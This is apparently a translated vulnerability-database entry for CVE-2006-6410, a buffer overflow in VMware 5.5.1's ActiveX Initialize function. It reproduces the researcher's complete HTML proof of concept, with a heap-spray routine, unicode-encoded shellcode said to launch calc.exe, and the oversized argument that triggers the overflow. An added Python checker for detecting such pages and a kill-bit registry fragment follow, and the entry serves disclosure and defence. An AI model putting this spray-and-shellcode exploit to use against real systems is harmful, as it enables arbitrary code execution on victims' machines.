VMware ActiveX Control Initialize Function Buffer Overflow Vulnerability

Vulnerability ID: 1110901    Vulnerability type: Buffer overflow
Published: 2006-08-27    Updated: 2006-12-11
CVE ID: CVE-2006-6410    CNNVD ID: CNNVD-200612-170
Platform: Windows    CVSS score: 4.6
|Sources
https://www.exploit-db.com/exploits/2264
https://cxsecurity.com/issue/WLB-2006120080
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-170
|Vulnerability details
The ActiveX control shipped with VMware 5.5.1 contains a buffer overflow. A local user can execute arbitrary code by passing an overly long VmdbDb argument to the control's Initialize function.
|Exploit (PoC)
/*
 *****************************************************************************************************************
  $ An open security advisory #17 - VMWare ActiveX lame local overflow
 *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org
  2: Bug Released: August 18th or so... 2006
  3: Bug Impact Rate: Code execution
  4: Bug Scope Rate: Local 
 *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
 *****************************************************************************************************************


 VMWare
 http://vmware.com

 "Revolutionize software development, testing and deployment in your enterprise with powerful virtual
 machine software for developers and system administrators. VMware Workstation delivers powerful
 virtual machine software for the technical professional."

 Since this is local only for an ActiveX component, it requires being emailed or distributed via some
 p2p file share network or p2p chat networks. Pretty useless :)

*/


<html>
<head>
<title>WinXP Pro SP2 lame local VMWare Buffer Overflow</title>
</head>
<body>
<center>
<br>
Discovered and developed by c0ntex - c0ntexb@gmail.com<br>
Visit my website at http://www.open-security.org<br>
<br>
<h3>
This will exploit overflow and execute calc.exe on WinXP Pro SP2<br>
(fully patched) against VMWare 5.5.1 Initialize ActiveX member.<br>
</h3>
I have only found a bad solution to this bug. Due to the fact that<br>
my controlling assembler is a call dword ptr[reg] I need to point<br>
to a location I control, fine. However my payload is random pretty<br>
much every run. Therefore I fill half a HUGE buffer with the address<br>
(pointer) to my evil buffer, which then trampolines me to shellcode<br>
<br>
call ptr [reg]<br>
[reg] -> 0xtrampoline<br>
0xtrampoline -> shellcode<br>
<br>
</center>
<script>
var buffa1 = unescape("%uedb0%u0d91") 
do {
buffa1 += buffa1;
}
while (buffa1.length < 0x500000);
var buffa2 = unescape("%u9090%u9090") 
do {
buffa2 += buffa2;
}
while (buffa2.length < 0x800000);
buffa1 += buffa2;
buffa1 += unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" + 
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");
</script>
<object id="target" classid="clsid:F76E4799-379B-4362-BCC4-68B753D10744">
</object>
<script language="vbscript">
VmdbDb=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
VmdbPoll=200011744
target.Initialize VmdbDb, VmdbPoll
</script>
</body>

# milw0rm.com [2006-08-27]
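The record above describes two things a defender can key on: a page that instantiates the control's CLSID, and the heap-spray / oversized-argument shape of the PoC (a string doubled in a loop until it is megabytes long, then a long VmdbDb value handed to Initialize). The following is an added example, written for this page and not code from the CNNVD record, from c0ntex's advisory or from VMware. It is a small static checker that flags those features in an HTML file and emits the Internet Explorer kill-bit registry entry (Compatibility Flags = 0x400 under the ActiveX Compatibility key, the documented way to stop IE loading a control) for the CLSID. The regex heuristics, the thresholds, and the sample page are assumptions constructed for the example; only the CLSID comes from the page.

```python
"""
Added example, not part of the CNNVD record or c0ntex's advisory: a small
static checker for HTML pages that instantiate the VMware ActiveX control
described above and use the heap-spray / oversized-argument pattern the
advisory explains, plus a generator for the Internet Explorer kill-bit
registry entry that stops the control from being loaded by the browser.
The thresholds and the sample page are constructed for this example.
"""
import re

# CLSID taken from the advisory's <object> tag.
VMWARE_VMDB_CLSID = "F76E4799-379B-4362-BCC4-68B753D10744"
KNOWN_VULNERABLE_CLSIDS = {VMWARE_VMDB_CLSID}

# Assumed heuristic thresholds.
SPRAY_LENGTH_THRESHOLD = 0x100000   # a string doubled past 1 MiB is a heap spray
LONG_ARG_THRESHOLD = 64             # string literals longer than this are suspect

OBJECT_RE = re.compile(
    r'<object[^>]*classid\s*=\s*"clsid:([0-9A-Fa-f-]{36})"', re.I)
# `x += x; } while (x.length < N)`: the doubling loop used to fill the heap
DOUBLING_RE = re.compile(
    r'(\w+)\s*\+=\s*\1\s*;?\s*}\s*while\s*\(\s*\1\.length\s*<\s*'
    r'(0x[0-9A-Fa-f]+|\d+)', re.I)
# VBScript-style `name=value` lines and `obj.Initialize arg1, arg2` calls
VB_ASSIGN_RE = re.compile(r'^[ \t]*(\w+)[ \t]*=[ \t]*(.+?)[ \t]*$', re.M)
INITIALIZE_RE = re.compile(r'(\w+)\.Initialize\b[ \t]*([^\r\n]*)', re.I)


def _literal_length(expr, assignments):
    """Length of a quoted string literal, following one VBScript variable
    reference; None when the value is not a plain literal."""
    expr = expr.strip()
    if len(expr) >= 2 and expr[0] == '"' and expr[-1] == '"':
        return len(expr) - 2
    if expr in assignments:
        return _literal_length(assignments[expr], {})
    return None


def scan_html(html):
    """Return the suspicious features found in an HTML page."""
    findings = {"vulnerable_clsids": [], "heap_spray": [], "long_initialize_args": []}

    # 1. <object> tags that load a CLSID known to be vulnerable
    for clsid in OBJECT_RE.findall(html):
        if clsid.upper() in KNOWN_VULNERABLE_CLSIDS:
            findings["vulnerable_clsids"].append(clsid.upper())

    # 2. doubling loops that grow a string past the spray threshold
    for var, limit in DOUBLING_RE.findall(html):
        size = int(limit, 0)
        if size >= SPRAY_LENGTH_THRESHOLD:
            findings["heap_spray"].append((var, size))

    # 3. Initialize calls whose first argument is an oversized literal
    assignments = dict(VB_ASSIGN_RE.findall(html))
    for obj, args in INITIALIZE_RE.findall(html):
        first_arg = args.split(",")[0]
        length = _literal_length(first_arg, assignments)
        if length is not None and length > LONG_ARG_THRESHOLD:
            findings["long_initialize_args"].append((obj, first_arg.strip(), length))

    return findings


def is_suspicious(findings):
    return any(findings.values())


def killbit_reg(clsid):
    """Produce a .reg fragment that sets the IE kill bit for CLSID
    (Compatibility Flags = 0x400 under the ActiveX Compatibility key)."""
    key = ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\"
           "ActiveX Compatibility\\{" + clsid.upper() + "}")
    return ("Windows Registry Editor Version 5.00\r\n\r\n"
            "[" + key + "]\r\n"
            '"Compatibility Flags"=dword:00000400\r\n')


# Constructed sample page: the same shape as the advisory's PoC but with a
# NOP-only spray and a plain run of "A"s instead of a payload.
SAMPLE_HTML = ('<html><body>\n'
               '<script>\n'
               'var buf = unescape("%u9090%u9090");\n'
               'do { buf += buf; } while (buf.length < 0x500000);\n'
               '</script>\n'
               '<object id="target" classid="clsid:' + VMWARE_VMDB_CLSID + '"></object>\n'
               '<script language="vbscript">\n'
               'VmdbDb="' + "A" * 200 + '"\n'
               'VmdbPoll=200011744\n'
               'target.Initialize VmdbDb, VmdbPoll\n'
               '</script>\n'
               '</body></html>\n')

if __name__ == "__main__":
    result = scan_html(SAMPLE_HTML)
    print(result)
    if is_suspicious(result):
        print(killbit_reg(VMWARE_VMDB_CLSID))
```

The three checks are independent on purpose: a kill-bitted CLSID in an `<object>` tag is worth a finding on its own, while the spray and long-argument heuristics catch the same technique aimed at a control not yet on the known list. Note that the PoC as posted assigns VmdbDb without quotes, which VBScript treats as a variable reference rather than a string; the checker therefore only counts quoted literals, and a bare token yields no finding.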
|References

Source: BID
Name: 19732
Link: http://www.securityfocus.com/bid/19732
Source: BUGTRAQ
Name: 20061127 Re: VMware 5.5.1 Local Buffer Overflow (HTML Exploit)
Link: http://www.securityfocus.com/archive/1/archive/1/452775/100/100/threaded
Source: BUGTRAQ
Name: 20061126 VMware 5.5.1 Local Buffer Overflow (HTML Exploit)
Link: http://www.securityfocus.com/archive/1/archive/1/452746/100/100/threaded
Source: MISC
Link: http://www.open-security.org/advisories/17
Source: MILW0RM
Name: 2264
Link: http://www.milw0rm.com/exploits/2264
Source: SREASON
Name: 2008
Link: http://securityreason.com/securityalert/2008
Source: MILW0RM
Name: 2264
Link: http://milw0rm.com/exploits/2264